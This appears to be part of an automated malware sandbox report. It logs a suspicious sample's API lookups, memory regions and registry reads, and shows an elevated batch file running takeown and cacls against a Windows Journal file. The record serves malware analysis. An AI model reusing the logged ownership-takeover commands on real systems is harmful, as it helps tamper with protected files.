| Get Address | c:\windows\syswow64\kernel32.dll | function = EncodePointer, address_out = 0x7770f190 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DecodePointer, address_out = 0x7770a200 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x74f674f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleExW, address_out = 0x74f59fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x74f52d60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x74f575a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x74f525e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleMode, address_out = 0x74f66870 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleInputA, address_out = 0x74f668c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleMode, address_out = 0x74f66900 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x74f59700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThreadId, address_out = 0x74f51b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitThread, address_out = 0x77712570 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryExW, address_out = 0x74f57920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteCriticalSection, address_out = 0x77709920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushFileBuffers, address_out = 0x74f662a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x74f66590 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleCP, address_out = 0x74f66860 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x74f5a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x74f59680 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x74f664a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStartupInfoW, address_out = 0x74f5a080 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x74f828e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x74f5a2c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x74f66020 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x74f577b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x74f5fbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsAlloc, address_out = 0x74f59a70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsGetValue, address_out = 0x74f51ba0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsSetValue, address_out = 0x74f51da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsFree, address_out = 0x74f59930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidCodePage, address_out = 0x74f5a090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetACP, address_out = 0x74f58770 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetOEMCP, address_out = 0x74f5fd10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCPInfo, address_out = 0x74f59fc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x74f57910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RtlUnwind, address_out = 0x74f59a80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x74f52dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x74f51d90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x74f52b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentStringsW, address_out = 0x74f5a3b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeEnvironmentStringsW, address_out = 0x74f5a0f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapReAlloc, address_out = 0x776ebae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEndOfFile, address_out = 0x74f664f0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetTokenInformation, address_out = 0x7756ed40 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegDeleteKeyW, address_out = 0x7756fca0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupPrivilegeValueW, address_out = 0x775695e0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AdjustTokenPrivileges, address_out = 0x77570680 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenProcessToken, address_out = 0x7756ee90 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExW, address_out = 0x7756f0a0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExW, address_out = 0x7756ed60 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExW, address_out = 0x7756ed80 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyW, address_out = 0x7756f590 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyW, address_out = 0x775706c0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCloseKey, address_out = 0x7756efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupAccountSidW, address_out = 0x7756f7b0 |
|
1 | |
| Get Address | c:\windows\syswow64\comdlg32.dll | function = PrintDlgW, address_out = 0x766dc6a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartPage, address_out = 0x750dee10 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndDoc, address_out = 0x750b55a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartDocW, address_out = 0x750b57e0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = SetMapMode, address_out = 0x750b9590 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = GetDeviceCaps, address_out = 0x750b0820 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndPage, address_out = 0x750dfbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SendMessageW, address_out = 0x76c838f0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DialogBoxIndirectParamW, address_out = 0x76c9b6b0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = EndDialog, address_out = 0x76c9b430 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadCursorW, address_out = 0x76c87740 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = InflateRect, address_out = 0x76c974e0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSysColorBrush, address_out = 0x76c9efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetCursor, address_out = 0x76ca4ed0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetWindowTextW, address_out = 0x76c94580 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetDlgItem, address_out = 0x76c91540 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoW, address_out = 0x742f1580 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = VerQueryValueW, address_out = 0x742f1500 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoSizeW, address_out = 0x742f1560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x74f5a330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x74f5f400 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x74f57580 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x74f59910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x74f66030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x74f65f90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x74f65ff0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x74f5a5d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x74f5a690 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x776e40f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x776dd630 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x776decf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x74f65720 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x776de140 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x776deb60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x77719990 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x77715540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x77709dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x74f5a550 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x74f80a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x752c0790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x74f5f8a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x74f5fa30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatEx, address_out = 0x74f81030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x74f5a000 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatEx, address_out = 0x74f814b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x74f5a4f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocaleName, address_out = 0x74f816f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x74f59970 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x75243c90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x74f58710 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsWow64Process, address_out = 0x74f596e0 |
|
1 |
System (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2019-01-23 14:12:50 (UTC) |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #189: cmd.exe
239
0
| Information | Value |
|---|---|
| ID | #189 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c ""C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat" "C:\Program Files\Windows Journal\PDIALOG.exe"" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:16, Reason: Child Process |
| Unmonitor | End Time: 00:04:02, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:46 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xea0 |
| Parent PID | 0xa70 (c:\users\ciihmnxmn6ps\desktop\mngrxc.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
458
0x
FE4
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x00000000002c0000 | 0x002c0000 | 0x002dffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000002c0000 | 0x002c0000 | 0x002cffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000002d0000 | 0x002d0000 | 0x002d3fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002e0000 | 0x002e0000 | 0x002e1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002e0000 | 0x002e0000 | 0x002e3fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000002f0000 | 0x002f0000 | 0x00303fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000310000 | 0x00310000 | 0x0034ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000350000 | 0x00350000 | 0x00353fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000360000 | 0x00360000 | 0x00360fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000370000 | 0x00370000 | 0x00371fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000380000 | 0x00380000 | 0x003bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003c0000 | 0x003c0000 | 0x003cffff | Private Memory | rw |
|
|
|
- |
| cmd.exe | 0x003f0000 | 0x0043ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000440000 | 0x00440000 | 0x0443ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004440000 | 0x04440000 | 0x0453ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x04540000 | 0x045fdfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004640000 | 0x04640000 | 0x0464ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004650000 | 0x04650000 | 0x047fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004800000 | 0x04800000 | 0x048fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004900000 | 0x04900000 | 0x04a4ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x04a50000 | 0x04d86fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| cmdext.dll | 0x741b0000 | 0x741b7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007ed90000 | 0x7ed90000 | 0x7ee8ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ee90000 | 0x7ee90000 | 0x7eeb2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007eeb6000 | 0x7eeb6000 | 0x7eeb8fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007eeb9000 | 0x7eeb9000 | 0x7eebbfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007eebc000 | 0x7eebc000 | 0x7eebcfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007eebf000 | 0x7eebf000 | 0x7eebffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (167)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
4 | |
| Get Info | "C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat" | type = file_attributes |
|
1 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
22 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | - | type = file_type |
|
3 | |
| Open | STD_OUTPUT_HANDLE | - |
|
77 | |
| Open | STD_INPUT_HANDLE | - |
|
6 | |
| Open | - | - |
|
4 | |
| Open | - | - |
|
4 | |
| Open | - | - |
|
12 | |
| Read | - | size = 8191, size_out = 226 |
|
1 | |
| Read | - | size = 8191, size_out = 194 |
|
1 | |
| Read | - | size = 8191, size_out = 179 |
|
1 | |
| Read | - | size = 8191, size_out = 163 |
|
1 | |
| Read | - | size = 8191, size_out = 148 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 2 |
|
10 | |
| Write | STD_OUTPUT_HANDLE | size = 30 |
|
4 | |
| Write | STD_OUTPUT_HANDLE | size = 5 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 72 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 7 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 51 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 3 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 18 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 37 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 30 |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 232, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (2)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\cacls.exe | os_pid = 0xf40, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | C:\Windows\system32\takeown.exe | os_pid = 0xe98, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x3f0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x74f40000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x74f82780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x74f5fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x74f5a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x752a35c0 |
|
1 |
Environment (43)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
12 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
5 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
6 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Get Environment String | name = USERNAME, result_out = CIiHmnxMn6Ps |
|
1 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
5 | |
| Get Environment String | name = FN, result_out = "PDIALOG.exe" |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
2 | |
| Set Environment String | name = COPYCMD |
|
2 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
2 | |
| Set Environment String | name = =ExitCodeAscii |
|
2 | |
| Set Environment String | name = FN, value = "PDIALOG.exe" |
|
1 |
Process #190: takeown.exe
0
0
| Information | Value |
|---|---|
| ID | #190 |
| File Name | c:\windows\syswow64\takeown.exe |
| Command Line | takeown /F "C:\Program Files\Windows Journal\Templates\Music.jtp" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:16, Reason: Child Process |
| Unmonitor | End Time: 00:03:19, Reason: Self Terminated |
| Monitor Duration | 00:00:03 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x36c |
| Parent PID | 0xde0 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
FCC
0x
B60
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000260000 | 0x00260000 | 0x0027ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000260000 | 0x00260000 | 0x0026ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000270000 | 0x00270000 | 0x00273fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000280000 | 0x00280000 | 0x00281fff | Private Memory | rw |
|
|
|
- |
| takeown.exe.mui | 0x00280000 | 0x00284fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000290000 | 0x00290000 | 0x002a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000002b0000 | 0x002b0000 | 0x002effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002f0000 | 0x002f0000 | 0x0032ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000330000 | 0x00330000 | 0x00333fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000340000 | 0x00340000 | 0x00340fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000350000 | 0x00350000 | 0x00351fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00360000 | 0x0041dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000420000 | 0x00420000 | 0x0045ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000460000 | 0x00460000 | 0x0046ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000470000 | 0x00470000 | 0x0068ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000470000 | 0x00470000 | 0x004affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000004b0000 | 0x004b0000 | 0x0051ffff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x004b0000 | 0x004d9fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000004b0000 | 0x004b0000 | 0x004b0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000004c0000 | 0x004c0000 | 0x004c0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000510000 | 0x00510000 | 0x0051ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000590000 | 0x00590000 | 0x0068ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000690000 | 0x00690000 | 0x00817fff | Pagefile Backed Memory | r |
|
|
|
- |
